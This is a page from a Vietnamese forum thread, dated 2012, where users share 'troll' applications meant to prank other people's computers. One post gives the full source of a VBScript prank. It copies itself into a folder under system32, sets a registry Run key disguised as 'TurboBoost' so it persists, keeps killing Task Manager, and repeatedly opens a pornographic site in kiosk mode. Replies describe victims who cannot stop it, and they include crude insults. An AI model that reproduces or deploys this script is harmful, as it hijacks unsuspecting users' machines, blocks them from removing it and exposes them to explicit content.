Reply
 
Thread Tools
  #71  
Old 07-12-2012, 02:46
GTA's GTA's is offline
K.I.A
Join Date: 11-2012
Posts: 103
Re: [Hội những người thích troll]Ứng dụng để troll

Thớt đã chứng minh cho cả thế giới biết f17er ngu nhưng có độ lì rất cao. =))
Reply With Quote
  #72  
Old 07-12-2012, 03:10
Callmemaybe Callmemaybe is offline
Đã tốn tiền
Join Date: 06-2012
Posts: 2,477
Re: [Hội những người thích troll]Ứng dụng để troll

các thím cho em hỏi sao e ko mở đc mấy cái file này vậy.
Reply With Quote
  #73  
Old 07-12-2012, 11:40
Google.vn2 Google.vn2 is offline
Senior Member
Join Date: 11-2012
Posts: 408
Re: [Hội những người thích troll]Ứng dụng để troll

cái 1 hay cái 2 hay hơn hả mọi ngừoi
Reply With Quote
  #74  
Old 07-12-2012, 11:41
limax2's Avatar
limax2 limax2 is offline
Senior Member
Join Date: 10-2012
Posts: 111
Re: [Hội những người thích troll]Ứng dụng để troll

up cho thằng nào muốn biết cảm giác của tao ngày hôm qua
Reply With Quote
  #75  
Old 07-12-2012, 13:28
quangthanh93 quangthanh93 is offline
Senior Member
Join Date: 11-2008
Posts: 120
Re: [Hội những người thích troll]Ứng dụng để troll

Muốn thữ mà chưa biết cách tắt =]]
Mà nó kiêu gì thế mấy thím
Reply With Quote
  #76  
Old 07-12-2012, 13:49
Người Sao Hỏa Người Sao Hỏa is offline
Đã tốn tiền
Join Date: 07-2009
Posts: 671
Re: [Hội những người thích troll]Ứng dụng để troll

Máy em chạy không được, tội nghiệp đám chuột bạch
Reply With Quote
  #77  
Old 07-12-2012, 13:51
mistake37 mistake37 is offline
Senior Member
Join Date: 02-2007
Posts: 1,876
Re: [Hội những người thích troll]Ứng dụng để troll

Source troll 2, :O

Code:
Dim wshShell, objRandom, randomfolder, randomname, param, reg, objFSO, objFolder, objCreate, sleeptime, dteWait

Set objRandom = CreateObject( "System.Random" )

Set wshShell = CreateObject("WScript.Shell")

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFolder = objFSO.GetFolder(".")randomfolder =  "c:\windows\system32\" & objRandom.Next_2( 1000, 9999 ) & "\"

objCreate = objFSO.CreateFolder(randomfolder)

randomname = randomfolder & objRandom.Next_2( 1000, 9999 ) & ".vbs"

param = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbs"+  chr(34) + " " + chr(34) + randomname + chr(34)

wshShell.Run param , 0, True

reg = "wscript.exe //b //nologo " + chr(34) + randomname + chr(34)

do

sleeptime = objRandom.Next_2( 5, 30 )

wshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TurboBoost", reg, "REG_SZ"

dteWait = DateAdd("s", sleeptime, Now())

Do Until (Now() > dteWait)

wshShell.Run "taskkill /im taskmgr.exe", 0, True

Loop

wscript.Sleep sleeptime

wshShell.Run "iexplore.exe -k http://www.xvideos.com"

loop
Vãi loop
Reply With Quote
  #78  
Old 07-12-2012, 13:56
onedirection onedirection is offline
K.I.A
Join Date: 11-2012
Posts: 0
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by boydautroc..ditimnico View Post
đụ mẹ mày thằng thớt, cái lồn mẹ mày chơi gì kỳ vậy mày, làm sao tắt đây mày

k chỉ cách tao lùng được mày thì đừng trách tao thằng mặt lồn
vãi bác, có vẻ ức chế quá nhỉ, mình cũng tải về rồi mà éo dãm click đúp vào
Reply With Quote
  #79  
Old 07-12-2012, 14:04
kinzzi2910 kinzzi2910 is offline
Member
Join Date: 05-2012
Posts: 58
Re: [Hội những người thích troll]Ứng dụng để troll

Giờ thì mình đã hiểu tại sao tối hôm qua con bé dưới tầng 1 ở khu trọ mình tự dưng ra cửa ngồi khóc ầm lên. Ra hóng thì thấy nó kêu MÁY TÍNH KHÔNG TẮT ĐƯỢC, nghe kỹ thì thấy máy nó cứ lặp đi lặp lại 1 đoạn lời gì đó. Hóa ra là từ thằng thớt này à

Last edited by kinzzi2910; 07-12-2012 at 14:20.
Reply With Quote
  #80  
Old 07-12-2012, 14:13
sector7's Avatar
sector7 sector7 is offline
Senior Member
Join Date: 04-2012
Location: Ασία ήπειρο - γη
Posts: 1,378
Re: [Hội những người thích troll]Ứng dụng để troll

móa,tắt cả task manager hả
__________________
YASSSSS QUEEN!
Reply With Quote
Reply

« Previous Thread | Next Thread »
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT +7. The time now is 03:59.